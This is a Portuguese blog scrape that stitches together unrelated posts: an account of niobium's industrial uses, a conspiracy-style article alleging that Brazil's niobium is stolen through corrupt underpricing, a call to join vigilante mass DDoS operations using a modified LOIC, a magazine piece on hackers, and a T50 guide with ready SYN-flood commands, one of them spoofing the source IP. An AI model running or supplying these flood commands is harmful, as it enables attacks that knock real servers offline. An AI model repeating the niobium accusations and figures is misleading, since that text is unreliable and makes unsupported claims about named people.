Plataformas marítimas são construídas por empresas de engenharia, de acordo com as especificações estipuladas pelas companhias de petróleo. As tiras laminadas a frio são produzidas em laminadores a frio. Essas chapas são usadas na construção de pontes, viadutos e edifícios .        Clientes finais incluem governos e empresas da iniciativa privada. Como aplicações adicionais das chapas grossas de aço microligado, pode-se ainda citar o setor de maquinaria pesada e vasos de pressão. É também amplo o emprego da tira laminada a quente na indústria automotiva, notadamente nos chassis de caminhões, nas rodas e em algumas partes estruturais. Seu uso pode ser observado ainda em guindastes vagões ferroviários contê
ineres e veículos fora de estrada. As tiras laminadas a frio são largamente aplicadas na construção da carroceria de automóveis.Desenvolvidos nos EUA pela Armco Steel, no final da década de 60, os aços Interstitial Free alcançaram produção em larga escala no Japão, no início dos anos 80. Atualmente são amplamente produzidos também na América do Norte, Europa e em alguns países em desenvolvimento, como Coréia do Sul e Brasil. Os produtores de aço têm liberdade na definição da composição química desses aços, desde que atendam às especificações de propriedades exigidas pelas empresas automobilísticas. Mais de 30 das mais importantes companhias siderúrgicas do mundo estão empenhadas no projeto de desenvolvimento da Carroceria de Aço Ultra-Leve (Ultra Light Steel Autobody, ULSAB). Um protótipo demonstrativo foi construído pela Porsche e, se esse projeto tiver sucesso, uma grande porcentagem de aços usados conterá nióbio. Produtos Não-Planos Os produtos não-planos em geral são produzidos pelas siderúr-gicas de menor porte, as miniusinas, em forma de barras, perfis ou fio máquina. Todos podem ter o nível de resistência mecânica elevado pelo nióbio. Os perfis estruturais, como cantoneiras e vigas I, têm grande emprego na construção civil, que constitui um importante consumidor de aços não-planos. Estão presentes também nas estruturas das torres de transmissão e de vagões ferroviários. O nióbio está cada vez mais ocupando o lugar do vanádio nessas aplicações. As barras para concreto, de resistência mecânica elevada, são produzidas com adição de nióbio ou vanádio. Algumas siderúrgicas modernas aplicam o sistema de resfriamento acelerado com água, dispensando o uso de microligas como forma de aumentar a resistência mecânica. O nióbio encontra aplicação em trilhos  de elevada resistência mecânica e ao desgaste, para ferrovias que operem sob condição de alta carga por eixo. Um importante produtor é a Nippon Steel Corporation.
A principal aplicação do aço ferrítico contendo nióbio é no sistema de escapamento dos automóveis.Nesse componente, o aço inoxidável com adição de nióbio tem melhor desempenho nas condições de trabalho em temperatura elevada, garantindo maior durabilidade à peça.Além dos inoxidáveis, os aços resistentes ao calor, utilizados na indústria petroquímica e nas usinas termoelétricas, freqüente-mente são fundidos por centrifugação e enriquecidos com nióbio. A Pont-A-Mousson e a Wisconsin são importantes produtores para a indústria petroquímica. Outros Produtos de Ferro e Aço No universo das aplicações do nióbio, destaca-se ainda sua presença nos tubos sem costura, em aços-ferramenta, em ferro fundido e em peças de aço fundido. Os tubos produzidos com aços de alta resistência mecânica, microligados ao nióbio, são usados na perfuração e no revestimento de poços de petróleo e de gás.
 No desenvolvimento de aços-ferramenta de alto desempenho, o nióbio aparece como elemento formador de carbonetos (NbC). Aços-ferramenta contendo nióbio estão também sendo utilizados em produtos como cilindros de laminadores e eletrodos para endurecimento superficial (hard-facing). Böhler, Cartech, National Roll e Villares são alguns dos fabricantes mais conhecidos. O uso do nióbio em ferros fundidos é mais recente, ocorrendo em peças para uso automotivo, como camisas de cilindros e anéis de segmento, e também em discos de freio de caminhões.
A Cofap abastece os fabricantes de veículos brasileiros e também exporta para a Europa. A Mercedes-Benz, tanto na Europa quanto no Brasil, produz para uso próprio produtos em ferro fundido contendo nióbio. O aço fundido microligado ao nióbio combina resistência mecânica e tenacidade em níveis elevados.
Nos Estados Unidos, Blaw Knox Rolls e Whemco são produtores de destaque. Superligas Dentre os materiais projetados para funcionar por longos períodos em atmosferas altamente oxidantes e corrosivas, submetidos a temperaturas acima de 650°C, estão as chamadas superligas, que demandam o segundo maior consumo de nióbio depois da indústria do aço. Dezenas de superligas estão em uso nos mais diversos meios corrosivos ou operando em altas temperaturas. Entre todas, a liga mais importante é a Inconel 718, à base de níquel, contendo de 5,3 a 5,5% de nióbio. Essa liga forma nada menos que a espinha dorsal dos motores a jato, tanto comerciais quanto militares. O CFM56 - o motor a jato mais usado hoje em dia, feito pela joint-venture GE/Snecma - contém cerca de 300 quilos de nióbio de alta pureza. Vale lembrar que a maior parte desse nióbio é proveniente da mina da CBMM em Araxá, Minas Gerais.
A General Electric americana solucionou problemas associados à exposição de materiais a altas temperaturas utilizando as superligas Inconel 718 e Inconel 706. Outras empresas ainda estão tentando projetar sistemas de resfriamento mais eficientes que permitam dispensar o uso das superligas. Contudo, a principal demanda pela liga 718 ainda vem dos fabricantes de motores para aeronaves
A indústria aeronáutica projeta, para os próximos dez anos, a entrega de pelo menos 6 mil jatos comerciais de grande porte, o que assegura uma forte e contínua demanda para o nióbio utilizado na Inconel 718. Isso porque, embora os atuais usuários finais das superligas sejam as empresas Airbus e Boeing, a decisão final sobre qual fabricante fornecerá o motor para uma aeronave é sempre da companhia aérea ou do comprador do avião. E como, historicamente, os níveis de ruído e consumo de combustível influenciam de modo considerável essa escolha, a meta dos fabricantes tem sido reverter as deficiências nesses campos por meio do aumento da velocidade de rotação (o que também aumenta a temperatura de funcionamento) e do coeficiente de bypass, progressos só possíveis com a melhora que tem sido obtida na tecnologia de fabricação das superligas à base de níquel, especialmente a liga 718. Existe, ainda, um outro fator decisivo nesta equação. A indústria de grande porte, apoiada nos avanços tecnológicos, atingiu um estágio de amadurecimento que aboliu as grandes desproporções, estabelecendo um equilíbrio tal que, a título de exemplo, os três atuais fornecedores de motores para Boeing 777 - General Electric, Pratt & Whitney e Rolls Royce - oferecem um equipamento de desempenho quase rigorosamente semelhante, circunstância que leva o comprador a basear sua escolha em itens como peso, confiabilidade, qualidade de atendimento e, mais importante, preço final do produto. Há uma outra situação que favorece a continuidade do emprego das superligas de nióbio convencionais. Desenvolver e qualificar uma nova liga para motores demandaria anos de pesquisas e custos que, calculados grosso modo, superariam 50 milhões de dólares.
O emprego de nióbio puro e as ligas à base de nióbio são a meta, há algum tempo, dos fabricantes de motores a jato, uma vez que o nióbio é o metal refratário de menor densidade que se conhece.No caso do nióbio usado em supercondutividade, os projetos estatais adquirem os magnetos supercondutores de fabricantes como a General Dynamics e a General Electric, que, por sua vez, compram os cabos supercondutores da Alsthom, Furukawa, Hitachi, ICG, Kobe, LMI, Outokumpu, Oxford, Sumitomo, Supercon e Vacuumschmelze.
Essas são apenas algumas das aplicações do Nióbio e algumas das empresas que o ultilizão na  facricação de seus produtos dentre inumeras outras.
fonte: niobiomineriobrasileiro.blogspot.com

                   Nióbio: A riqueza subjugada.
  O Brasil com reserva de mais de 97%, em Catalão e Araxá, é o maior produtor mundial de nióbio, e o consumo mundial é de aproximadamente 37 mil toneladas anuais do minério totalmente brasileiro.
Segundo o artigo "A questão do nióbio", do administrador de empresas e membro da Liga da Defesa Nacional, Ronaldo Schlichting, publicado pelo jornal A nova democracia, o Brasil se subjuga, e deveria dar mais valor às suas riquezas naturais. Ele lembra que o país detém 98% das reservas mundiais exploráveis de nióbio, e o mundo consome, anualmente, cerca de 37 mil toneladas do minério, totalmente retiradas do território nacional. Em sua opinião, o preço do nióbio refinado, com 99,9% de pureza, tem um preço na Bolsa de Metais de Londres meramente simbólico, já que o Brasil praticamente é o único produtor mundial. Ele chega a dizer que o metal, a este preço, é como "um barril de petróleo vendido a US$ 1".
No texto, Schlichting acusa o governo brasileiro de "negligência com a seriedade das questões", e diz ainda que supostos interesses "escusos" estariam moldando a forma de lidar com o valor do nióbio.
Ao fim de seu artigo, o empresário afirma que "o Brasil está pagando para ter todo o seu nióbio roubado”
A Companhia Brasileira de Metalurgia e Mineração (CBMM), a maior exploradora mundial, do Grupo Moreira Salles e da multinacional Molycorp, em Araxá, exporta 95% do nióbio extraído de Minas Gerais.
Segundo o artigo de Schlichting, que menciona o citado no jornal Folha de São Paulo, 5 de novembro de 2003: “Lula passou o final de semana em Araxá em casa da CBMM do Grupo Moreira Salles e da multinacional Molycorp…” E, complementa que “uma ONG financiou projetos do Instituto Cidadania, presidido por Luiz Inácio da Silva, inclusive o ‘Fome Zero’, que integra o programa de governo do presidente eleito”.
O Brasil como único exportador mundial do minério não dá o preço no mercado externo, o preço do metal quase 100% refinado é cotado a US$ 90 o quilo na Bolsa de Metais de Londres, enquanto que totalmente bruto, no garimpo o quilo custa 400 reais. Na cotação do dólar de hoje (R$ 1,75), R$ 400,00 = $ 228,57. Portanto, $ 228,57 – $ 90,00 = $ 138,57. Como conclusão, o sucesso do governo atual nas exportações é “sucesso de enganação”. O brasileiro é totalmente ludibriado com propagandas falsas de progressos nas exportações, mas, em relação aos negócios internacionais, de verdadeiro é a concretização de maus negócios.Nas jazidas de Catalão e Araxá o nióbio bruto, extraído da mina, custa 228,57 dólares e é vendido no exterior, refinado, por 90 dólares. Como é que pode ocorrer tal tipo de transação comercial com total prejuízo para a população do país? É muito descaso com as questões do país e o desinteresse com o bem-estar do povo brasileiro. Como os EUA, a Europa e o Japão são totalmente dependentes do nióbio e o Brasil é o único fornecedor mundial, era para todos os problemas econômicos, a liquidação total da dívida externa e de subdesenvolvimento serem totalmente resolvidos.Uma gama extensa de processos que permitam os traidores obterem vantagens faz parte para ampliar a divulgação da descrença, anestesiando o povo, dando a certeza de que o Brasil não tem mais jeito.
A questão do nióbio é tão vergonhosa que na realidade o mundo todo consome 100% do nióbio brasileiro, sendo que os dados oficiais registram como exportação somente 40%. Anos e anos de subfaturamento tem acumulado um prejuízo para o país de bilhões e bilhões de dólares anuais.
em recente entrevista o secretário de Turismo da cidade de Araxá relatou a importância do Nióbio...
"Pra que vocês tenham uma idéia daqui, os hotéis da cidade vivem abarrotados... e não só pelos turistas que visitam a cidade em razão do balneário junto ao Grande Hotel, onde se encontram os tratamentos em saunas, duchas, hidroterapia, mecanoterapia e aplicação da lama medicinal... os hotéis ficam abarrotados principalmente pelos americanos, japoneses, europeus, canadenses, árabes, e endinheirados do mundo inteiro atrás desse tal de nióbio...eles precisam dele para mil e uma utilidades... principalmente para a fabricação das turbinas dos aviões..."
Na CPI dos Correios, o sr. Marcos Valério deixou escapar que  "levou o pessoal do BMG ao José Dirceu para negociar nióbio" e "o grosso do dinheiro vem do contrabando do nióbio."
Ninguém teve coragem de investigar...
Isso após Lula ter se hospedado na casa do presidente da CMN, a maior exploradora do nióbio brasileiro, e de ter seu programa Fome Zero financiado pela ONG dessa companhia,logo após o assento do PT no governo nacional, o presidente Lula decretou a criação da reserva "indígena" Raposa Serra do Sol...
E é de se estranhar mais ainda quando os índios se rebelaram, pegaram em armas e fizeram policiais federais como reféns,  exigindo o cancelamento do decreto que cria a tal reserva. Perguntinha ingênua: mas se não são os índios que estão exigindo a criação da reserva, quem seria?
Ganha uma das maiores reservas do mundo de urânio e nióbio quem souber responder...

Nióbio, o estratégico minério brasileiro.
http://brasilnicolaci.blogspot.com.br/2011/10/niobio-o-estrategico-minerio-brasileiro.html


Nióbio, o Pulo-do-Gato dos Governantes Brasileiros
http://currentecalamo.wordpress.com/niobio-o-pulo-do-gato-dos-governantes-brasileiros/

CONGO: GUERRAS, GENOCÍDIOS E OUTRAS BARBÁRIES PELO NIÓBIO-COLTAN
http://niobiodobrasil.blogspot.com.br/2012_05_01_archive.html



Videos:
Nióbio - Maior Riqueza do Brasil:
http://www.youtube.com/watch?v=a2AEeIpvXwE

"Brasileiro é tão bonzinho1...(Nióbio)"
Brasileiro é tão bonzinho2...(Nióbio)
http://www.youtube.com/watch?v=RPrmh_a9vWA&feature=related

http://www.youtube.com/watch?v=YxxD-Jg6Pc0&feature=relmfu

Nióbio: exportar commodities até quando?
http://www.youtube.com/watch?v=IJ6hkZ-SFFo&feature=related

2006: Prof Enéas fala sobre Nióbio; ONGs+reservas indígenas
http://www.youtube.com/watch?v=WQhR0Dvtnn8&feature=related

Niobium:
http://www.youtube.com/watch?v=iw2jvPsmnkg&list=LPZe21pymyI9M&index=6&feature=plcp

Acorda Brasil! Nióbio: Brasil 98 X 2 Canadá
http://www.youtube.com/watch?v=YRuHMopKkfc

30 - NIÓBIO fraudes na exportação
http://www.youtube.com/watch?v=P_DTQZOeCkk

NIÓBIO A RIQUEZA DO BRASIL ESTÁ SENDO ROUBADA pt
http://www.youtube.com/watch?v=U1Vaf1LHNRw&feature=fvsr

NIÓBIO - WIKILEAKS DIZ QUE MINERAÇÃO EM ARAXÁ É POSSÍVEL ALVO DE TERRORISTAS
http://www.youtube.com/watch?v=gidrH7t1wAU


Documento reproduzido a partir do pastebin:
http://pastebin.com/NZR967eM

terça-feira, 6 de novembro de 2012

LOIC Personalizado projeto destruição ant-pedofilia



Grupo no Facebook.  Este é um grupo anti pedofilia anonymous. Peço que todos divulguem este grupo aos quatro ventos, para enchermos de anonymous e dentro desse grupo criarmos varias #Op Anti-Pedofilia para atacar massivamente estes sites vergonhosos, usando informações conquistadas na deep web.  A exposição dos nomes destes sites levantados pelos usuários será para fazer dentro do grupo varias #Op Anti-Pedofilia, para ataque simultâneo de vários sites ao mesmo tempo, a ideia é criar panico entre esse porcos, pois saibam que eles fazem muita comunicação entre eles.  A ideia é fazer com que muitos que se atreverão passar esse tipo de conteúdo pensassem trilhões de vezes antes de espalhar essas porcarias, tenho certeza que muitos correriam disso e não fariam o que fazem hoje, como se eles nem tivesse medo.


LOIC
é um programa de computador de código aberto escrito em C♯[1] que tem como objetivo executar um ataque de negação de serviço (também conhecido como DoS, do inglês "Denial of Service"). O programa foi desenvolvido pela Praetox Technologies em 2006 com o intuito de avaliar e testar redes, sendo depois disponibilizado para domínio público. O nome LOIC é a abreviação de Low Orbit Ion Cannon, uma arma fictícia existente no jogo de vídeo game Command & Conquer.

Uma versão em JavaScript foi escrita para permitir seu uso a partir de um navegador.[2]
Funcionamento

O LOIC executa um DoS ou, quando usado simultaneamente por muitas pessoas, um DoS distribuído (ou DDoS). O site alvo é inundado com pacotes de requisição TCP ou UDP com a intenção de sobrecarregar o servidor, fazendo com que ele deixe de responder às requisições legítimas.[3]

É frequente o uso de botnets para efetuar ataques através do LOIC. Computadores infectados ao redor do mundo são utilizados como "zumbis" para realizar os ataques, sem o conhecimento de seus donos. Tais computadores, normalmente pertencentes a usuários leigos, são infectados por vírus através de e-mails falsos e páginas da internet em geral, passando a ser usados em ataques de DDoS.[4]




Grupo no Facebook.

Este é um grupo anti pedofilia anonymous. Peço que todos divulguem este grupo aos quatro ventos, para enchermos de anonymous e dentro desse grupo criarmos varias #Op Anti-Pedofilia para atacar massivamente estes sites vergonhosos, usando informações conquistadas na deep web.

A exposição dos nomes destes sites levantados pelos usuários será para fazer dentro do grupo varias #Op Anti-Pedofilia, para ataque simultâneo de vários sites ao mesmo tempo, a ideia é criar panico entre esse porcos, pois saibam que eles fazem muita comunicação entre eles.

A ideia é fazer com que muitos que se atreverão passar esse tipo de conteúdo pensassem trilhões de vezes antes de espalhar essas porcarias, tenho certeza que muitos correriam disso e não fariam o que fazem hoje, como se eles nem tivesse medo.
-----------------------------------------------------------------------------------------------------------------------------



Denuncias devem ser enviadas para esse blog:
http://projetodestruicaopedofilia.blogspot.com.br/p/c.html

Editei o Loic para divulgação do #PROJETO DESTRUIÇÃO Grupo do facebook.

Link:https://www.facebook.com/groups/projetodestruicao/



Dow: http://www.4shared.com/rar/_F_X9o-f/LOIC_-_OP-PEDOFILIOUT.html

Hackers: entre a ideologia libertária e o crime

Hackers: entre a ideologia libertária e o crime  A imagem produzida no senso-comum para a figura do hacker é a do jovem que passa o dia inteiro na frente de um computador, conhecedor dos segredos da informática e dos caminhos nas conexões via Internet. Essa visão não está longe da realidade. No entanto, a definição maior do termo surge do efeito que essas atividades podem gerar. O conhecimento das ferramentas que acionam e regem sistemas e programas pode ser usado para democratizar informações ou para atos criminosos. As atividades possíveis através do domínio da ciência da


Hackers: entre a ideologia libertária e o crime

A imagem produzida no senso-comum para a figura do hacker é a do jovem que passa o dia inteiro na frente de um computador, conhecedor dos segredos da informática e dos caminhos nas conexões via Internet. Essa visão não está longe da realidade. No entanto, a definição maior do termo surge do efeito que essas atividades podem gerar. O conhecimento das ferramentas que acionam e regem sistemas e programas pode ser usado para democratizar informações ou para atos criminosos. As atividades possíveis através do domínio da ciência da computação vão desde pequenas invasões em páginas da Internet, sem maiores conseqüências, até desvio de grandes quantias de dinheiro em contas bancárias. Por outro lado, o domínio da máquina pode promover a divulgação do conhecimento, que não interessa a grupos econômicos e governos ditatoriais.

Há muita controvérsia em relação à palavra hacker. Na sua origem, nos anos 60, era usada para designar as pessoas que se interessavam em programar computadores. Passados mais de quarenta anos, após o surgimento do computador pessoal e da Internet, o sentido da palavra hacker mudou e hoje ela é usada nos noticiários para definir invasores de sistemas alheios e até autores de crimes eletrônicos, para desespero dos hackers originais. Os hackers da velha guarda defendem a categoria e um código de ética. Outros, que também intitulam-se hackers, promovem invasões, a disseminação de vírus por computador e gostam de divulgar seus codinomes.

Há até a tentativa de classificar os hackers como pessoas que promovem a liberdade de expressão e de informações, e os crackers como causadores de prejuízo. Mas essa classificação também gera uma confusão de sentidos. A palavra cracker, vem do verbo em inglês "to crack", significando, aqui, quebrar códigos de segurança. Mas, muitas vezes para promover a livre informação é preciso "crakear", fazendo do legítimo hacker, também um cracker.

Os hackers, em geral, partem do princípio de que todo sistema de segurança tem uma falha e a função deles é encontrar essa porta, seja qual for a finalidade. Um programador de computador experiente é capaz de desenvolver várias habilidades como comandar computadores alheios à distância, fazer alterações em sites, invadir sistemas de empresas e governos e ter acesso a diversos tipos de informação. Outra atividade ainda mais comprometedora é a capacidade de descobrir senhas de cartões de créditos, senhas de acesso às contas bancárias e de quebrar as senhas de proteção dos programas comerciais, tornando disponível a chamada pirataria de softwares.

O desenvolvedor de software Lisias Toledo, membro da comunidade do software livre, entretanto, prefere utilizar várias definições ao invés de apenas o termo hacker. "Crackers são aqueles que invadem computadores através da quebra de códigos, quem faz alterações em sites são os defacers e quem cria vírus são os virii-makers", diz. Para ele, os hackers sabem que todo o conhecimento é poder. "Quem rouba informações ou dinheiro não é hacker, é ladrão", completa.

No Brasil, cabe à Polícia Federal e à Polícia Civil de cada estado a função de investigar os delitos cometidos através do computador. Em São Paulo, funciona o Centro de Crimes pela Internet, atrelado ao Deic. Em Brasília, existe, desde 1995, no Instituto Nacional de Criminalística, a Seção de Crimes por Computador, ligada a Perícia Técnica da Polícia Federal. A equipe de sete peritos especializados na área de crimes cibernéticos é a responsável por emitir laudos oficiais. Os laudos são pedidos através de denúncias no Ministério Público ou para serem anexados em inquéritos feitos nas delegacias da Polícia Federal.

Em relação aos hackers e crakers, Marcelo Correia Gomes, chefe da Seção de Crimes por Computador, diz que há atuações para identificar invasões de sites do Governo Federal, do Presidente da República e dos Ministérios. "Dependendo do nível de conhecimento do hacker pode ser fácil ou impossível encontrar o invasor". Segundo ele, os hackers mais experientes não atacam a partir do próprio computador mas invadem outros computadores para, então, roubar a senha e fazer a invasão. O usuário do computador que tem a senha roubada, nem desconfia que está sendo usado.

"É difícil, mas a gente vai seguindo até determinar o autor que, em certos casos, pode até responder por ofensa às autoridades", diz o perito Gomes. No caso de prejuízos aos sites de empresas, como a legislação brasileira não especifica esses crimes, a qualificação do delito depende da forma como o delegado vai fazer o inquérito.

Os crimes mais graves aplicados através da Internet recebem o rótulo de estelionato na desatualizada legislação brasileira. Esse foi o caso de uma quadrilha presa em novembro do ano passado, na cidade de Marabá no Pará. A quadrilha atuava no sistema de home banking, quebrando a senha de correntistas e fazendo a transferência de dinheiro.

"O que mais tem na Internet são hackers especializados em quebrar senhas de segurança de programas comerciais. Quando saiu o Windows XP, depois de seis horas já era possível craquear o programa", diz Marcelo Gomes.

Hackers românticos

Entre a comunidade hacker mundial, há os que propagam uma ideologia e uma ética própria que remontam o romantismo da origem do termo, no final dos anos 60.

O filósofo finlandês Pekka Himanen, defende em seu livro A Ética dos Hackers e o espírito da era da informação, que os legítimos hackers lutam pela liberdade de expressão e pela socialização do conhecimento. Ele divide a categoria em duas vertentes: os libertários hackers e os contraventores crakers, que buscam senhas bancárias e dados sigilosos de empresas.

Himanen, que é professor na universidade de Helsinque e de Berkeley na Califórnia, enumera várias atuações significativas de hackers que revolucionaram o mundo digital. Entre elas estão: a criação do sistema Linux, por Linus Torvalds em 1991, que tem o código-fonte aberto e pode ser adquirido livremente com os aplicativos disponíveis na Internet e a criação do formato MP3 e do programa Napster, para troca de músicas através da Internet.

Para o filósofo, os hackers também foram importantes para garantir a liberdade de expressão na Guerra de Kosovo, divulgando na Internet informações de rádios censuradas e levando informações para a China, atuando contra a censura oficial. São os ecos da contracultura de uma geração acostumada a protestar. Essa geração criou a revolução digital e os remanescentes que não se alinharam com as grandes empresas como a Microsoft, criaram a ideologia hacker.

A tecnologia sendo usada para o bem estar e a diversão de todos. O trabalho como um prazer não como uma obrigação. Estas frases refletem a filosofia do hackers "românticos". Algumas organizações como a Internet Society lutam contra a exclusão digital em países do terceiro mundo, ensinando as pessoas a navegar e a dominar os sistemas.

Hoje, há hackers que pregam uma revolução digital com acesso livre e gratuito aos programas de computadores e trocas de bens de consumos culturais através de Internet. São pessoas que quebram os sistemas de segurança e tornam os produtos acessíveis a quem desejar. Um exemplo são os códigos de segurança de DVDs, que são craqueados e o filme pode ser compactado em um formato em que é possível o seu compartilhamento pela Internet, assim como aconteceu há alguns anos com o formato .mp3 (veja reportagem sobre Copyleft nesta edição).

Outra forma de atuação na "socialização do conhecimento" acontece nos sites que ensinam como quebrar os códigos de segurança da maioria dos softwares disponíveis no mercado ou fazem a indicação do site onde se pode conseguir o programa craqueado. O mais famoso é o Astalavista. Este site também oferece um ranking de sites oficiais de hackers de todo o mundo.

Hackers perigosos

Existem várias formas de testar sistemas de segurança e provar o talento de hackers com más intenções. As primeiras lições são as brincadeiras de invadir páginas e sistemas de empresas, que contam pontos no currículo dessa espécie de hacker. No Brasil há vários sites que promovem aulas de linguagem de computadores (Java, Flash e etc.) para invadir e danificar outros sites e salas de bate-bapo para troca de informações.

Mas esses sites são restritos e têm um sistema de proteção contra invasões bem seguro. A maioria exige um cadastro para a navegação, como as páginas Inferno. Além das lições básicas, esses sites oferecem donwloads de programas, livros e arquivos hackers, jogos, vídeos, arquivos de música em MP3, shows de bandas de rock e até pornografia. Mas é preciso ter cuidado ao acessar algumas páginas, que podem enviar vírus para o computador do internauta assim que é acessada. Um exemplo é o site chamado Hackers Ninja Home Page. Esta página pode infestar o computador com o vírus j.s.exception.exploit.

Os hackers brasileiros também são bem conceituados internacionalmente. As páginas brasileiras estão em segundo lugar no ranking de invasões, segundo o site www.alldas.org, que faz o registro de páginas invadidas na Internet. Mas os números não são muito confiáveis porque quem envia a notificação são os próprios invasores. Empresas atingidas evitam divulgar as invasões porque acabam denunciando as próprias falhas de segurança. O brasileiro Rinaldo Ribeiro é tetracampeão mundial de invasão de sistemas em campeonato promovido pelo instituto de segurança Sans. Hoje Ribeiro trabalha na empresa de segurança Módulo.

A absorção dos hackers pelo mercado de trabalho na área de segurança é um caminho para os que se destacam. O conhecimento adquirido acaba sendo usado profissionalmente com boa remuneração. Há um grande mercado de serviços de empresas que vendem a proteção dos sistemas de computadores e no caso da Sans, até promove campeonato entre hackers. É uma boa forma de propagar os perigos de um sistema sem segurança e de incentivar as invasões para se criar a necessidade do produto. Esta lei de mercado cibernético também vale para as grandes empresas que fabricam programas antivírus e se beneficiam da imensa quantidade de novos vírus produzidos mensalmente em escala mundial.

segunda-feira, 5 de novembro de 2012

Ataque DDos usando T50

T50 Experimental Packet Injector Tool

T50 Experimental Packet Injector Tool

Referencia rápida pra utilizar o T50:
ex:01
./t50 200.16.2.X --flood --turbo --dport (80 443) -S --protocol TCP

Neste procedimento floodar o ip, adicionar o modo turbo, atacar as portas 80 e 443, usando somente SYN nos protocolo TCP.

ex:02
./t50 200.16.2.X --flood --turbo --dport (80) -S -s 200.16.2.Y --protocol TCP

Neste procedimento floodar o ip, adiciona o modo turbo, atacar somente a porta 80 usando SYN e mascarando  seu ip com 200.16.2.Y no protocolo TCP

--protocol TCP
Faz um randômico de todos os protocolos

--sport 80 --dport 443
Ataca através da porta de origem 80 no alvo 443


Utilizando o programa de monitoramento de rede Wireshark podemos observar os pacotes sendo enviados

Quanto mais detalhado o processo de ataque mais rápido seu algo vai á lona.

Baixar:http://t50.sourceforge.net/